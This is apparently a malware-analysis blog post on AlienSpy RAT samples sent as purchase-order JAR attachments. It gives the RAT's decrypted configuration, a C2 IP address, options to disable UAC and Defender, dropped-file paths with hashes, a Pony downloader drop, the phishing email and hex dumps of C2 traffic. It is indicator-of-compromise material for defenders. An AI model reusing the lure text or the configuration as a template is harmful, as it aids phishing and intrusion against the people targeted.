<span style="font-family: Courier New, Courier, monospace;"><!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd"></span><br />
<span style="font-family: Courier New, Courier, monospace;"><properties></span><br />
<span style="font-family: Courier New, Courier, monospace;"><comment>AlienSpy</comment></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="pluginfolder">fy0qFUFuLP</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="reconnetion_time">3000</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="ps_hacker">true</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="restore_system">true</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="pluginfoldername">fy0qFUFuLP</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="dns"><b>38.89.137.248</b></entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="install_time">3000</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="port2">1065</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="port1">1064</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="taskmgr">true</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="vmware">false</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="jarname">LcuSMagrlF</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="msconfig">true</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="mutex">VblVc5kEqY</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="install">true</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="instalar">true</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="vbox">false</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="password">7110eda4d09e062aa5e4a390b0a572ac0d2c0220</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="NAME">xmas things</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="extensionname">7h8</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="prefix">xmas</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="jarfoldername">jcwDpUEpCh</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="uac">true</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="win_defender">true</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="</span><br />
<br />
IP:<span class="Apple-tab-span" style="white-space: pre;"> </span><b>38.89.137.248</b><br />
Decimal:<span class="Apple-tab-span" style="white-space: pre;"> </span>643402232<br />
Hostname:<span class="Apple-tab-span" style="white-space: pre;"> </span>38.89.137.248<br />
ISP:<span class="Apple-tab-span" style="white-space: pre;"> </span>Cogent Communications<br />
Country:<span class="Apple-tab-span" style="white-space: pre;"> </span>United States us flag<br />
<span style="background-color: white;"></span>
<br />
<div>
<br /></div>
<div>
<div style="background-color: #618f2b; color: white; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: Courier New, Courier, monospace;"><b>Created Files</b></span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace;"><b>I</b></span></div>
<div>
<span style="background-color: #d9ead3;"><b> DB46ADCFAE462E7C475C171FBE66DF82 paymentadvice.jar</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
%USERPROFILE%\Application Data\evt88IWdHO\<b>CnREgyvLBS.txt </b><<MD5: abe6ef71e44d2e145033800d0dccea57 <<<a href="http://contagioexchange.blogspot.com/2014/11/alienspy-classes-strings-from-md5.html"> strings are here (by classes)</a><br />
%USERPROFILE%\Application Data\evt88IWdHO\<b>Desktop.ini</b><br />
%USERPROFILE%\Local Settings\Temp\<b>asdqw15727804162199772615555.jar <</b><a href="http://contagioexchange.blogspot.com/2014/11/alienspy-classes-strings-from-md5.html">< Strings are here</a><br />
%USERPROFILE%\Local Settings\Temp\<b>iWimMQLgpsT2624529381479181764.png (seen Transfer.jar in the stream) </b><<MD5: fab8de636d6f1ec93eeecaade8b9bc68 Size: 755017 << <a href="http://contagioexchange.blogspot.com/2014/11/iwimmqlgpst2624529381479181764png-java.html">Strings are here</a><br />
<div>
%USERPROFILE%\<b>29OVHAabdr.tmp <</b>< timestamp file <a href="http://contagioexchange.blogspot.com/2014/11/alienspy-timestamp-file-29ovhaabdrtmp.html"><< Strings are here</a></div>
</div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: inherit;">\deleted_files\%USERPROFILE%\\<b>29OVHAabdr.tmp <</b>< timestamp file<a href="http://contagioexchange.blogspot.com/2014/11/alienspy-timestamp-file-29ovhaabdrtmp.html"> << Strings are here</a></span></div>
<div>
<span style="font-family: inherit;">\deleted_files\%USERPROFILE%\\Application Data\9bor9J6cRd\<b>Desktop.ini </b><a href="http://contagioexchange.blogspot.com/2014/11/e783bdd20a976eaeaae1ff4624487420.html"><< Strings are here</a></span></div>
<div>
<span style="font-family: inherit;">\deleted_files\%USERPROFILE%\\Application Data\9bor9J6cRd\<b>unXX0JIhwW.txt <</b>< </span>MD5: DB46ADCFAE462E7C475C171FBE66DF82 < original jar << <a href="http://contagioexchange.blogspot.com/2014/11/aliensply-rat-strings.html">Strings are here</a></div>
<div>
<span style="font-family: inherit;">\deleted_files\%USERPROFILE%\\Local Settings\Temp<b>\14583359.bat </b><a href="http://contagioexchange.blogspot.com/2014/11/pony-loader-dropped-bat-file.html"><< Strings are here</a></span></div>
<div>
<span style="font-family: inherit;">\deleted_files\%USERPROFILE%\\Local Settings\Temp\<b>asdqw4727319084772952101234.exe << <span style="color: red;">Pony Downloader</span></b> </span>MD5: b5e7cd42b45f8670adaf96bbca5ae2d0 Size: 792122 <a href="http://contagioexchange.blogspot.com/2014/11/pony-loader-strings-asdqw47273190847729.html#more">< Strings are here</a></div>
<div>
<span style="font-family: inherit;">\deleted_files\%USERPROFILE%\\Local Settings\Temp\</span><b style="font-family: inherit;">OiuFr7LcfXq1847924646026958055.vbs </b><span style="font-family: inherit;"><<</span>MD5: 9E1EDE0DEDADB7AF34C0222ADA2D58C9 <a href="http://contagioexchange.blogspot.com/2014/11/oiufr7lcfxq1847924646026958055vbs.html" style="font-family: inherit;">Strings are here</a></div>
<div>
<span style="font-family: inherit;">\deleted_files\%USERPROFILE%\\<b>xooJlYrm61.tmp < timestamp file </b><a href="http://contagioexchange.blogspot.com/2014/11/alienspy-timestamp-file-29ovhaabdrtmp.html"><b><</b>< Strings are here</a></span></div>
<div>
<span style="font-family: inherit;">\deleted_files\C\WINDOWS\<b>tem.txt </b>- 0bytes</span></div>
<div style="font-family: 'Courier New', Courier, monospace; font-weight: bold;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-weight: bold;">
IWIMMQLGPST2624529381479181764.PNG MD5: <span style="font-family: 'Times New Roman'; font-weight: normal;">fab8de636d6f1ec93eeecaade8b9bc68</span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"></span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;">├───<b>com</b></span></div>
<div style="font-family: 'Courier New', Courier, monospace;">
│ └──<b>─java</b></div>
<div style="font-family: 'Courier New', Courier, monospace;">
│ │ Main.class << MD5: d020b9fdac0139d43997f9ec14fa5947 Size: 7232</div>
<div style="font-family: 'Courier New', Courier, monospace;">
│ │ Manifest.mf << MD5: a396d2898e8a83aa5233c4258de006e3 Size: 750412</div>
<div style="font-family: 'Courier New', Courier, monospace;">
│ │ <span style="color: red;">01234.exe </span><< MD5: b5e7cd42b45f8670adaf96bbca5ae2d0 Size: 792122</div>
<div style="font-family: 'Courier New', Courier, monospace;">
│ │ 15555.jar << MD5: abe6ef71e44d2e145033800d0dccea57 Size: 50922</div>
<div style="font-family: 'Courier New', Courier, monospace;">
│ <b>│</b></div>
<div style="font-family: 'Courier New', Courier, monospace;">
<b>│ └───<i>15555</i></b></div>
<div style="font-family: 'Courier New', Courier, monospace;">
<i>│ │ ID</i></div>
<div style="font-family: 'Courier New', Courier, monospace;">
<i>│ │ Main.class << MD5: d020b9fdac0139d43997f9ec14fa5947 Size: 7232</i></div>
<div style="font-family: 'Courier New', Courier, monospace;">
<i>│ │ MANIFEST.MF << MD5: a396d2898e8a83aa5233c4258de006e3 Size: 750412</i></div>
<div style="font-family: 'Courier New', Courier, monospace;">
<i>│ │</i></div>
<div style="font-family: 'Courier New', Courier, monospace;">
<i>│ ├───META-INF</i></div>
<div style="font-family: 'Courier New', Courier, monospace;">
<i>│ └───plugins</i></div>
<div style="font-family: 'Courier New', Courier, monospace;">
└───META-INF</div>
<div style="font-family: 'Courier New', Courier, monospace;">
MANIFEST.MF << MD5: 042c2fa9077d96478ce585d210641d9a Size: 171</div>
<div>
<div style="font-family: 'Courier New', Courier, monospace; font-weight: bold;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-weight: bold;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-weight: bold;">
<span style="font-family: 'Times New Roman';">File types</span></div>
<div style="font-family: 'Courier New', Courier, monospace;">
</div>
<ol style="text-align: left;">
<li><span style="font-family: inherit;">14583359.bat (.txt) "Text file"</span></li>
<li><span style="font-family: inherit;">29OVHAabdr.tmp (.txt) "Text file"</span></li>
<li><span style="font-family: inherit;">asdqw15727804162199772615555.jar (.zip) "PKZIP Compressed"</span></li>
<li><span style="font-family: inherit;">asdqw4727319084772952101234.exe (.exe) "Executable File" </span></li>
<li><span style="font-family: inherit;">CnREgyvLBS.txt (.zip) "PKZIP Compressed"</span></li>
<li><span style="font-family: inherit;">Desktop.ini (.txt) "Text file"</span></li>
<li><span style="font-family: inherit;">DFR5.tmp (.txt) "Text file"</span></li>
<li><span style="font-family: inherit;">iWimMQLgpsT2624529381479181764.png (.zip) "Zip Compressed"</span></li>
<li><span style="font-family: inherit;">iWimMQLgpsT2624529381479181764.png (.zip) "PKZIP Compressed"</span></li>
<li><span style="font-family: inherit;">OiuFr7LcfXq1847924646026958055.vbs (.txt) "Vbs script file"</span></li>
<li><span style="font-family: inherit;">tem.txt (.txt) "Text file"</span></li>
<li><span style="font-family: inherit;">unXX0JIhwW.txt (.zip) "PKZIP Compressed"</span></li>
<li><span style="font-family: inherit;">xooJlYrm61.tmp (.txt) "Text file"</span></li>
</ol>
<div>
II</div>
<div>
<br /></div>
<div>
<b><span style="background-color: #d9ead3; font-family: inherit;">79e9dd35aef6558461c4b93cd0c55b76 </span></b><b style="background-color: #d9ead3;">Purchase Order.jar</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxolQlbHYIBV7i-ynWj8FdBjsrAY6UwtuAmBfdz_wH_CNlMJBPVqzZMQ0HalAqYCojBoThQ-IikRgFLOgoWcKNhvaa47Ak_VxEgU5Q1xDTTMpNUfO_DUMcNK0-ya9Ge3sN88SdV5oEg2I/s1600/javaratemail.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxolQlbHYIBV7i-ynWj8FdBjsrAY6UwtuAmBfdz_wH_CNlMJBPVqzZMQ0HalAqYCojBoThQ-IikRgFLOgoWcKNhvaa47Ak_VxEgU5Q1xDTTMpNUfO_DUMcNK0-ya9Ge3sN88SdV5oEg2I/s1600/javaratemail.PNG" height="290" width="400" /></a></div>
<div>
<div>
<i>Received: from magix-webmail (webmail.app.magix-online.com [193.254.184.250])</i></div>
<div>
<i>by smtp.app.magix-online.com (Postfix) with ESMTPSA id B626052E77F;</i></div>
<div>
<i>Sun, 16 Nov 2014 14:54:06 +0100 (CET)</i></div>
<div>
<i>Received: from 206.217.192.188 ([206.217.192.188]) by</i></div>
<div>
<i> webmail.magix-online.com (Horde Framework) with HTTP; Sun, 16 Nov 2014</i></div>
<div>
<i> 14:54:06 +0100</i></div>
<div>
<i>Date: Sun, 16 Nov 2014 14:54:06 +0100</i></div>
<div>
<i>Message-ID: <20141116145406.Horde.YL7L4Bi7ap6_NXm76DDEaw2@webmail.magix-online.com></i></div>
<div>
<i>From: Outokumpu Import Co Ltd <purchase@brentyil.org></i></div>
<div>
<i>Subject: Re: Confirm correct details</i></div>
<div>
<i>Reply-to: jingwings@outlook.com</i></div>
<div>
<i>User-Agent: Internet Messaging Program (IMP) H5 (6.1.4)</i></div>
<div>
<i>Content-Type: multipart/mixed; boundary="=_FMdois7zoq7xTAV91epZoQ6"</i></div>
<div>
<i>MIME-Version: 1.0</i></div>
<div>
<i>Content-Transfer-Encoding: 8bit</i></div>
<div>
<i>This message is in MIME format.</i></div>
<div>
<i>--=_FMdois7zoq7xTAV91epZoQ6</i></div>
<div>
<i>Content-Type: text/plain; charset=UTF-8; format=flowed; DelSp=Yes</i></div>
<div>
<i>Content-Disposition: inline</i></div>
<div>
<i>Content-Transfer-Encoding: 8bit</i></div>
<div>
<i>Dear Sir,</i></div>
<div>
<i>Please confirm the attached purchase order for your reference.</i></div>
<div>
<i>Please acknowledge Invoice for the final confirmation and confirm </i></div>
<div>
<i>details are correct so we can proceed accordingly.</i></div>
<div>
<i>Please give me feedback through this email.</i></div>
<div>
<i>IBRAHIM MOHAMMAD AL FAR</i></div>
<div>
<i>Area Manager </i></div>
<div>
<i>Central Region</i></div>
<div>
<i>Outokumpu Import Co Ltd</i></div>
<div>
<i>Tel: +966-11-265-2030</i></div>
<div>
<i>Fax: +966-11-265-0350</i></div>
<div>
<i>Mob: +966-50 610 8743</i></div>
<div>
<i>P.O Box: 172 Riyadh 11383</i></div>
<div>
<i>Kingdom of Saudi Arabia</i></div>
<div>
<i>--=_FMdois7zoq7xTAV91epZoQ6</i></div>
<div>
<i>Content-Type: application/java-archive; name="Purchase Order.jar"</i></div>
<div>
<i>Content-Description: Purchase Order.jar</i></div>
<div>
<i>Content-Disposition: attachment; size=125985; filename="Purchase Order.jar"</i></div>
<div>
<i>Content-Transfer-Encoding: base64</i></div>
</div>
<div>
<br /></div>
<div>
<b><span style="font-family: inherit;">File paths</span></b></div>
<div>
<span style="font-family: inherit;">%USERPROFILE%\Application Data\jcwDpUEpCh\Desktop.ini</span></div>
</div>
<div>
<span style="font-family: inherit;">%USERPROFILE%\Application Data\jcwDpUEpCh\LcuSMagrlF.txt</span><br />
<span style="font-family: inherit;">%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014111620141117\index.dat</span><br />
<span style="font-family: inherit;">%USERPROFILE%\Local Settings\Temp\hsperfdata_Laura\3884</span><br />
<span style="font-family: inherit;">%USERPROFILE%\VblVc5kEqY.tmp</span><br />
<span style="font-family: inherit;">deleted_files\%USERPROFILE%\Local Settings\Temp\TaskNetworkGathor267205042636993976.reg</span><br />
<span style="font-family: inherit;">deleted_files\%USERPROFILE%\VblVc5kEqY.tmp</span><br />
<span style="font-family: inherit;">deleted_files\C\WINDOWS\tem.txt</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><b>File types</b></span><br />
<span style="font-family: inherit;">Desktop.ini (.txt) "Text file"</span><br />
<span style="font-family: inherit;">index.dat (.txt) "Text file"</span><br />
<span style="font-family: inherit;">LcuSMagrlF.txt (.zip) "PKZIP Compressed"</span><br />
<span style="font-family: inherit;">TaskNetworkGathor267205042636993976.reg (.txt) "Text file"</span><br />
<span style="font-family: inherit;">tem.txt (.txt) "Text file"</span><br />
<span style="font-family: inherit;">VblVc5kEqY.tmp (.txt) "Text file"</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><b>MD5 list</b></span><br />
<span style="font-family: inherit;">Desktop.ini e783bdd20a976eaeaae1ff4624487420</span><br />
<span style="font-family: inherit;">index.dat b431d50792262b0ef75a3d79a4ca4a81</span><br />
<span style="font-family: inherit;">LcuSMagrlF.txt 79e9dd35aef6558461c4b93cd0c55b76</span><br />
<span style="font-family: inherit;">79e9dd35aef6558461c4b93cd0c55b76.malware 79e9dd35aef6558461c4b93cd0c55b76</span><br />
<span style="font-family: inherit;">TaskNetworkGathor267205042636993976.reg 6486acf0ca96ecdc981398855255b699 <a href="http://contagioexchange.blogspot.com/2014/11/6486acf0ca96ecdc981398855255b699.html"><< Strings are here</a></span><br />
<span style="font-family: inherit;">tem.txt d41d8cd98f00b204e9800998ecf8427e</span><br />
<span style="font-family: inherit;">VblVc5kEqY.tmp b5c6ea9aaf042d88ee8cd61ec305880b</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">III</span><br />
<span style="background-color: #d9ead3;"><b>B2856B11FF23D35DA2C9C906C61781BA </b><b>Purchase Order.jar</b></span><br />
<span style="font-family: inherit;"><b>File paths</b></span><br />
%USERPROFILE%\Application Data\Sys32\Desktop.ini<br />
%USERPROFILE%\Application Data\Sys32\Windows.jar.txt<br />
%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014111620141117\index.dat<br />
%USERPROFILE%\Local Settings\Temp\hsperfdata_Laura\1132<br />
%USERPROFILE%\WWMI853JfC.tmp<br />
deleted_files\%USERPROFILE%\Local Settings\Temp\TaskNetworkGathor7441169770678304780.reg<br />
deleted_files\%USERPROFILE%\Local Settings\History\History.IE5\MSHist012013110920131110\index.dat<br />
deleted_files\%USERPROFILE%\WWMI853JfC.tmp<br />
deleted_files\C\DFRA.tmp<br />
<br />
deleted_files\C\WINDOWS\tem<br />
<br />
<span style="font-family: inherit;"><b>File type list</b></span><br />
Desktop.ini (.txt) "Text file"<br />
DFRA.tmp (.txt) "Text file"<br />
index.dat (.txt) "Text file"<br />
TaskNetworkGathor7441169770678304780.reg (.txt) "Text file"<br />
tem (.txt) "Text file"<br />
Windows.jar.txt (.zip) "PKZIP Compressed"<br />
<br />
WWMI853JfC.tmp (.txt) "Text file"<br />
<b><br /></b>
<b>MD5 list</b><br />
Desktop.ini e783bdd20a976eaeaae1ff4624487420<br />
DFRA.tmp d41d8cd98f00b204e9800998ecf8427e<br />
index.dat b431d50792262b0ef75a3d79a4ca4a81<br />
purchase.jar b2856b11ff23d35da2c9c906c61781ba<br />
TaskNetworkGathor7441169770678304780.reg 311af3b9a52ffc58f46ad83afb1e93b6<br />
tem d41d8cd98f00b204e9800998ecf8427e<br />
Windows.jar.txt b2856b11ff23d35da2c9c906c61781ba<br />
WWMI853JfC.tmp 8e222c61fc55c230407ef1eb21a7daa9<br />
<br />
<br />
<div style="font-family: 'Times New Roman'; font-weight: normal;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-weight: bold;">
</div>
<div style="font-family: 'Times New Roman'; font-weight: normal;">
</div>
<div style="font-family: 'Courier New', Courier, monospace; font-weight: bold;">
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="background-color: #618f2b; color: white; font-size: 14px; line-height: 19px; text-align: center;">
<div style="margin: 0px;">
<span style="font-family: Courier New, Courier, monospace;"><b>Traffic Information</b></span></div>
</div>
</div>
</div>
</div>
<br /></div>
<span style="background-color: #d9ead3; font-size: 14px; line-height: 19px;"><b><span style="font-family: inherit;">Java Serialization Protocol traffic info</span></b></span><br />
<span style="background-color: #d9ead3; font-size: 14px; line-height: 19px;"><b><span style="font-family: inherit;"><br /></span></b></span>
<span style="background-color: white;">DB46ADCFAE462E7C475C171FBE66DF82 traffic capture - Windows XP</span><br />
<span style="background-color: #f4cccc; font-family: 'Courier New', Courier, monospace;">00000000 </span><b style="background-color: #ea9999; font-family: 'Courier New', Courier, monospace;">ac ed 00 05</b><span style="background-color: #f4cccc; font-family: 'Courier New', Courier, monospace;"> <b>....</b></span><br />
<span style="background-color: #cfe2f3; font-family: Courier New, Courier, monospace;"> </span><span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #cfe2f3;">00000000 </span><b><span style="background-color: #9fc5e8;">ac ed 00 05</span> </b></span><span style="background-color: #cfe2f3; font-family: Courier New, Courier, monospace;"><b> </b> <b> ....</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #f4cccc;">00000004 </span><b style="background-color: #ea9999;">75 72 00 02 5b 42 ac f3 17 f8 06 08 54 e0 02 00</b><span style="background-color: #f4cccc;"> <b>ur..[B.. </b>....T...</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #f4cccc;">00000014 </span><b><span style="background-color: #ea9999;">00</span><span style="background-color: #f4cccc;"> </span></b><span style="background-color: #f4cccc;"> <b>.</b></span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #f4cccc;">00000015 </span><b style="background-color: #ea9999;">78 70</b><b style="background-color: #f4cccc;"> </b><span style="background-color: #f4cccc;">00 00</span><span style="background-color: #f4cccc;"> 03 2a </span><b><span style="background-color: #fff2cc;">1f 8b 08 00 00 00 00 00 00 00</span></b><span style="background-color: #f4cccc;"> <b>xp</b>...*.. ........</span></span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000025 6d 54 dd 8e d3 46 18 1d 12 16 b2 bb 59 40 fc 5d mT...F.. ....Y@.]</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000035 bb 52 2b 71 83 d7 76 1c 3b a1 12 10 58 16 36 2c .R+q..v. ;...X.6,</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000045 14 95 56 1b 24 4b d6 17 7b 9c cc 66 3c e3 ce 8c ..V.$K.. {..f<...</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000055 d7 a6 17 7d 8e 3e 44 1f a0 12 2f c1 43 f4 b6 ef ...}.>D. ../.C...</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000065 d0 cf 6c 76 1d 2a 22 d9 19 7b be 9f 73 be 73 c6 ..lv.*". .{..s.s.</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000075 7f fd 4b b6 b4 22 77 4f e1 0c ec d2 30 6e bf 53 ..K.."wO ....0n.S</span><br />
<br />
<span style="background-color: white;">DB46ADCFAE462E7C475C171FBE66DF82 traffic capture - OSX Lion</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #f4cccc;">00000000 </span><b style="background-color: #f4cccc;">ac ed 00 05</b><span style="background-color: #f4cccc;"> ....</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #cfe2f3;"> 00000000 </span><b><span style="background-color: #9fc5e8;">ac ed 00 05 </span><span style="background-color: #cfe2f3;"> ....</span></b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #f4cccc;">00000004 </span><b><span style="background-color: #ea9999;">75 72 00 02 5b 42 ac f3 17 f8 06 08 54 e0 02 00</span><span style="background-color: #f4cccc;"> ur..[B.. ....T...</span></b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #f4cccc;">00000014 </span><b><span style="background-color: #ea9999;">00</span> </b><span style="background-color: #f4cccc;"> .</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #f4cccc;">00000015 </span><b style="background-color: #ea9999;">78 70</b><span style="background-color: #f4cccc;"> 00 00 03 33 </span></span><span style="font-family: Courier New, Courier, monospace;"><b style="background-color: #fff2cc;">1f 8b 08 00 00 00 00 00 00 00</b></span><span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;"><b> </b>xp...3.. ........</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000025 75 54 cd 6e db 46 10 de c8 b5 2d ff 26 c8 1f 7a uT.n.F.. ..-.&..z</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000035 54 0f 45 7b d1 92 5c d1 94 89 02 4d 94 c0 b1 a5 T.E{..\. ...M....</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000045 d8 4d 51 23 89 73 22 56 dc a5 b5 16 b9 cb ec 2e .MQ#.s"V ........</span><br />
<br />
B2856B11FF23D35DA2C9C906C61781BA on Windows XP<br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #f4cccc;">00000000 </span><b><span style="background-color: #ea9999;">ac ed 00 05</span><span style="background-color: #f4cccc;"> </span></b><span style="background-color: #f4cccc;"> ....</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #cfe2f3;"> 00000000 </span><b><span style="background-color: #9fc5e8;">ac ed 00 05</span><span style="background-color: #cfe2f3;"> ....</span></b></span><br />
<span style="background-color: #cfe2f3; font-family: Courier New, Courier, monospace;">0</span><span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #f4cccc;">0000004 </span><b><span style="background-color: #ea9999;">75 72 00 02 5b 42 ac f3 17 f8 06 08 54 e0 02 00</span><span style="background-color: #f4cccc;"> ur..[B.. ....T...</span></b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #f4cccc;">00000014 </span><b><span style="background-color: #ea9999;">00</span> </b><span style="background-color: #f4cccc;"> .</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #f4cccc;">00000015 </span><b><span style="background-color: #ea9999;">78 70</span><span style="background-color: #f4cccc;"> </span></b><span style="background-color: #f4cccc;">00 00 03 63 </span><b style="background-color: #fff2cc;">1f 8b 08 00 00 00 00 00 00 00</b><span style="background-color: #f4cccc;"> xp...c.. ........</span></span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000025 6d 54 5d 6e db 46 10 de 48 91 2d db 8a 13 24 41 mT]n.F.. H.-...$A</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000035 fa ca 3e 14 08 0a 84 e6 bf a4 16 68 9a c4 75 1b ..>..... ...h..u.</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000045 c3 6e 0d b8 85 13 80 00 31 22 57 d2 5a e4 ee 76 .n...... 1"W.Z..v</span><br />
<br />
79E9DD35AEF6558461C4B93CD0C55B76 - Windows XP<br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #f4cccc;">00000000 </span><b style="background-color: #ea9999;">ac ed 00 05</b><span style="background-color: #f4cccc;"> ....</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #cfe2f3;"> 00000000 </span><b style="background-color: #9fc5e8;">ac ed 00 05 </b><span style="background-color: #cfe2f3;"> ....</span></span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000004 </span><span style="background-color: #ea9999; font-family: Courier New, Courier, monospace;"><b>75 72 00 02 5b 42 ac f3 17 f8 06 08 54 e0 02 00</b></span><span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;"> ur..[B.. ....T...</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000014 </span><span style="background-color: #ea9999; font-family: Courier New, Courier, monospace;"><b>00 </b></span><span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;"> .</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000015 </span><span style="background-color: #ea9999; font-family: Courier New, Courier, monospace;"><b>78 70</b></span><span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;"> 00 00 03 69 </span><span style="font-family: Courier New, Courier, monospace;"><b style="background-color: #fff2cc;">1f 8b 08 00 00 00 00 00 00 00</b></span><span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;"> xp...i.. ........</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000025 6d 54 dd 6e db 36 14 66 ed fc 38 89 9b 16 ed d0 mT.n.6.f ..8.....</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000035 de 6a 17 03 8a 01 53 28 d9 92 ed 0d e8 d6 34 71 .j....S( ......4q</span><br />
<br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000045 b6 c0 19 02 64 69 3b c0 80 70 2c d1 36 6d 4a 62 ....di;. .p,.6mJb</span><br />
<b><br /></b>
<b><br /></b>
<u><b><br /></b>
<b>Serialization Protocol decoding:</b></u><br />
<br />
The following fields are part of the serialization protocol and are 'benign" and common.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #ea9999;"><b>AC ED</b></span><span style="background-color: white;"><b> </b>(’) - Java Serialization protocol magic STREAM_MAGIC = (short)0xaced. </span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #ea9999;"><b>00 05 </b></span><span style="background-color: white;"> - Serialization Version STREAM_VERSION</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #ea9999;"><b>75</b></span><span style="background-color: white;"><b> </b> (u) - Specifies that this is a new array - newArray: TC_ARRAY</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #ea9999;"><b>72</b></span><span style="background-color: white;"><b> </b> (r) - Specifies that this is a new class - </span><span style="background-color: white;">newClassDesc: TC_CLASSDESC</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b style="background-color: #ea9999;">00 02</b><span style="background-color: white;"> - Length of the class name</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #ea9999;">5</span><b style="background-color: #ea9999;">B 42 AC F3 17 F8 06 08 54 E0</b><span style="background-color: white;"> ([B¬ó.ø..Tà) This is a Serial class name and version identifier section but data appears to be encrypted</span></span><br />
